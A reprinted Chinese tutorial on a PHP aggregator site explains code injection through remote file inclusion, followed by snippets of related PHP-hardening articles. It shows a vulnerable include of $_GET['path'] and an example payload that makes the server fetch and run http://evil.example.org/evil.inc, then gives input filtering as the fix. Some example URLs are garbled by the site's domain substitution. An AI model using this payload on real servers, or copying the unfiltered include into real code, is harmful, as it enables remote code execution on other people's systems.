PHP安全-代码注入

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了PHP安全-代码注入，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1472字，纯文字阅读大概需要3分钟。

内容图文

代码注入

一个特别危险的情形是当你试图使用被污染数据作为动态包含的前导部分时：

 <?php
 
  include "{$_GET['path']}/header.inc";
 
  ?>

在这种情形下攻击者能操纵不只是文件名，还能控制所包含的资源。由于PHP默认不只可以包含文件，还可以包含下面的资源（由配置文件中的allow_url_fopen所控制）：

 <?php
 
  include 'http://www.google.com/';
 
  ?>

include语句在此时会把http://www.gxlcms.com/的网页源代码作为本地文件一样包含进来。虽然上面的例子是无害的，但是想像一下如果GOOGLE返回的源代码包含PHP代码时会如何。这样其中包含的PHP代码就会被解析并执行。这是攻击者借以发布恶意代码摧毁你的安全体系的良机。

想象一下path的值指向了下面的攻击者所控制的资源：

http://www.gxlcms.com/ ... e.org%2Fevil.inc%3F

在上例中，path的值是URL编码过的，原值如下：

http://www.gxlcms.com/

这就导致了include语句包含并执行了攻击者所选定的脚本（evil.inc），同时原来的文件名/header.inc会被认为是一个请求串：

  <?php
 
  include 
"http://evil.example.org/evil.inc?/header.inc";
 
  ?>

这样攻击者就避免了去猜测剩下的目录和文件名(/header.onc)并在evil.example.org上建立相同的路径和文件名的必要性。相反地，在受攻击网站的具体文件名被屏蔽的情况下，他只要保证evil.inc中输出合法的他想要执行的代码就行了。

这种情况与允许攻击者在你的网站上直接修改PHP代码一样危险。幸运的是，只要在include和require语句前对数据进行过滤即可防止这种情况的发生：

<?php
 
  $clean = array();
 
  /* $_GET['path'] is filtered and stored in 
$clean['path']. */
 
  include "{$clean['path']}/header.inc";
 
  ?>

以上就是PHP安全-代码注入的内容，更多相关内容请关注PHP中文网（www.gxlcms.com）！

内容总结

以上是互联网集市为您收集整理的PHP安全-代码注入全部内容，希望文章能够帮你解决PHP安全-代码注入所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/146880.html

来源：【匿名】

【上一篇】PHP安全-文件名操纵【下一篇】PHP 5 数据对象 (PDO) 抽象层与 Oracle

更多 ►

【PHP安全-代码注入】教程文章相关的互联网学习教程文章

1.远程文件　　PHP是一门具有丰富特性的语言，它提供了大量函数，使程序员能够方便地实现各种功能，远程文件就是一个很好的例子：　　代码>　　$fp=@Fopen($url,"r") or die ("cannot open $url");　　while($line=@fgets($fp,1024)) {　　$contents.=$line;　　}　　echo $contents; //显示文件内容　　fclose($fp); //关闭文件　　?>　　以上是一段利用Fopen函数打开文件的代码，由于Fopen函数支持远程文件，使得它应用起来相当有...

php安全处理

1、php.ini 修改 open_basedir=‘d:\wwwroot‘ //配置只能访问指定的网站目录2、php.ini 修改 disable_funcitons=system,passthru,exec,shellexec,popen,phpinfo //禁止执行一些函数3、php.ini 修改display_errors =On 为display_errors =Off //禁止显示一些错误4、跨站脚本攻击（XSS）防御方法：写函数或者用htmlentities来进行对html或者javascript标签进行过滤5、sql注入漏洞防御方法：写函数或者addslashes()来过滤SQL关键字即...

php 安全过滤

/*ansic码-Url码表： http://www.w3school.com.cn/tags/html_ref_urlencode.html-----------------------------------------------------------------------------------------------------------------1、验证过滤用户的输入即使是最普通的字母数字输入也可能是危险的，列举几个容易引起安全问题的字符： ! $ ^ & * ( ) ~ [ ] \ | { } ‘ " ; < > ? - ` 在数据库中可能有特殊意义的字符： ‘ " ...

【thinkphp5】安全建议：隐藏后台登录入口地址

我们都知道后台 www.test.com/admin 是我们最常用的登录入口，方便的同时也留下了隐患，如果你刚好使用了 admin/123456 这种账号密码的方式，会导致我们的后台完全暴露在外。因此我们建议修改后台的登录入口，达到隐藏后台登录入口的效果。操作步骤1、首页修改 application/config.ph p中 deny_module_list 的值，其中默认已经有 common ，我们添加 admin ，改成 [‘common‘, ‘admin‘] 2、然后在项目 public 目录下新建 admin...

php – 安全隐藏表单数据$_POST

我只是在Chrome中徘徊,并意识到Chrome检查器中的用户可以更改隐藏的表单元素. 如上图所示,任何用户都可以进入并在Chrome中编辑表单,然后提交表单. 我很好奇是否有办法解决这个问题,例如更安全的方式将数据发送到我的文件,我不希望用户更改.解决方法:很简单,不要把它放在你的表格中.那么你可以把它放在哪里？将其存储在session中.

通过对php一些服务器端特性的配置加强php的安全

通过对php一些服务器端特性的配置加强php的安全 by san@xfocus.org 前面象Shaun Clowes和rfp等都比较详细的介绍了php、cgi程序在编程过程中遇到的问题，以及如何通过应用程序漏洞突破系统，这篇文章我们来通过对php的一些服务器端特性来进行配置加强php的安全。写 cgi脚本的时候我们的确一定注意各种安全问题，对用户输入进行严格的过滤，但是常在岸边走哪有不湿鞋，吃烧饼哪有不掉芝麻，人有失蹄马有失手，连著名的phpnuke、php...

PHP安全编程之加密功能

数据加密在我们生活中的地位已经越来越重要了，尤其是考虑到在网络上发生的大量交易和传输的大量数据。如果对于采用安全措施有兴趣的话，也一定会有兴趣了解PHP提供的一系列安全功能。在本篇文章中，我们将介绍这些功能，提供一些基本的用法，以便你能够为自己的应用软件中增加安全功能。预备知识在详细介绍PHP的安全功能之前，我们需要花点时间来向没有接触过这方面内容的读者介绍一些有关密码学的基本知识，如果对密码学的基本...

PHP安全配置

一、CGI模式安装安全二、以Apache模块安装安全当 PHP 以 Apache 模块方式安装时，它将继承 Apache 用户（通常为“nobody”）的权限。这对安全和认证有一些影响。比如，如果用 PHP 来访问数据库，除非数据库有自己的访问控制，否则就要使“nobody”用户可以访问数据库。这意味着恶意的脚本在不用提供用户名和密码时就可能访问和修改数据库。一个 web Spider 也完全有可能偶然发现数据库的管理页面，并且删除所有的数据库。可以通过...

通过对服务器端特性的配置加强php的安全

作者：san < xuzhikun@nsfocus.com > 主页：http://www.nsfocus.com 日期：2001-11-15 前面象Shaun Clowes和rfp等都比较详细的介绍了php、cgi程序在编程过程中遇到的问题，以及如何通过应用程序漏洞突破系统，这篇文章我们来通过对php的一些服务器端特性来进行配置加强php的安全。写 cgi脚本的时候我们的确一定注意各种安全问题，对用户输入进行严格的过滤，但是常在岸边走哪有不湿鞋，吃烧饼哪有不掉芝麻，人有失蹄马有失手...

分享十款最出色的PHP安全开发库中文详细介绍【图】

1. PHP入侵检测系统PHP IDS(即PHP-入侵检测系统)是一套易于使用、结构良好、速度出色且专门面向PHP类Web应用程序的先进安全层。这套入侵检测系统既不提供任何缓和及杀毒机制，也不会对恶意输入内容进行过滤，其作用单纯为识别出攻击者们针对站点进行的恶意活动、并以大家需要的方式作出及时提醒。凭借着一整套经过实践检验及相当严格的过滤规则，该检测系统会针对任何攻击活动给出一个影响评级数值，从而帮助用户更轻松地了解应如何...

OWASP 维护的 PHP 安全配置速查表【代码】【图】

介绍这个页面的目的是为了帮助那些配置 PHP 和运行它的 web 服务器的人确保它的安全性。下面你将找到有关 php.ini 文件的正确配置信息。php.ini下面的一些设置需要适应你的系统，特别是 session.save_path， session.cookie_path （例如： /var/www/mysite），和 session.cookie_domain （例如：ExampleSite.com）。你还应该运行 PHP 7.2 或者更高版本。如果你运行的版本是 PHP 7.0 和 PHP 7.1 ，你将在下面的几个地方使用略有不同...

PHP - 技术教程分类

PHP 教程 PHP 简介 PHP 安装 PHP 语法 PHP 变量 PHP echo/print PHP EOF(heredoc) PHP 数据类型 PHP 类型比较 PHP 常量 PHP 字符串 PHP 运算符 PHP If...Else PHP Switch PHP 数组 PHP 数组排序 PHP 超级全局变量 PHP While 循环 PHP For 循环 PHP 函数 PHP 魔术常量 PHP 命名空间 PHP 面向对象 PHP 测验 PHP 表单 PHP 表单验证 PHP 表单 - 必需字段 PHP 完整表单实例 PHP $_GET 变量 PHP $_POST 变量 PHP 多维数组 PHP 日期 PHP 包含 PHP 文件 PHP 文件上传 PHP Cookie PHP Session PHP E-mail PHP Error PHP Exception PHP 过滤器 PHP 7 新特性 PHP MySQL 简介 PHP MySQL 连接 PHP MySQL 创建数据库 PHP MySQL 创建数据表 PHP MySQL 插入数据 PHP MySQL 插入多条数据 PHP MySQL 预处理语句 PHP MySQL 读取数据 PHP MySQL Where PHP MySQL Order By PHP MySQL Update PHP MySQL Delete PHP ODBC AJAX 简介 AJAX PHP AJAX 数据库 AJAX 实时搜索 AJAX 投票 PHP Array PHP Calendar PHP cURL PHP Date PHP Directory PHP Error PHP Filesystem PHP Filter PHP FTP PHP HTTP PHP Mail PHP Math PHP Misc PHP MySQLi PHP PDO PHP String PHP Zip PHP Timezones PHP 图像处理 PHP RESTful PHP PCRE PHP 可用的函数 PHP Composer php 全部

PHP - 最热教程

php如何取出数组的前几个元素 PHP变量什么时候释放 PHP如何实现在数据库随机获取几条记录如何解决php base64解码乱码 php主要用于哪些领域 Laravel 批量插入(insert)数据六款国内优秀免费wordpress主题推荐 React如何从后端获取数据并渲染到前端？纯PHP实现定时器任务（Timer），php实现...php该如何安装pdo_mysql扩展

首页 / PHP / PHP安全-代码注入

PHP安全-代码注入

内容导读

内容图文

代码注入

内容总结

内容备注

内容手机端

【PHP安全-代码注入】教程文章相关的互联网学习教程文章

PHP在安全方面的另类应用

php安全处理

php 安全过滤

推荐的php安全配置选项

【thinkphp5】安全建议：隐藏后台登录入口地址

php – 安全隐藏表单数据$_POST

通过对php一些服务器端特性的配置加强php的安全

PHP安全编程之加密功能

PHP安全配置

通过对服务器端特性的配置加强php的安全

分享十款最出色的PHP安全开发库中文详细介绍【图】

OWASP 维护的 PHP 安全配置速查表【代码】【图】

php安全吗？【图】

java比php安全吗【图】

关于PHP安全编程的一些建议

PHP - 相关标签

PHP - 技术教程分类

PHP - 最新教程

PHP - 最热教程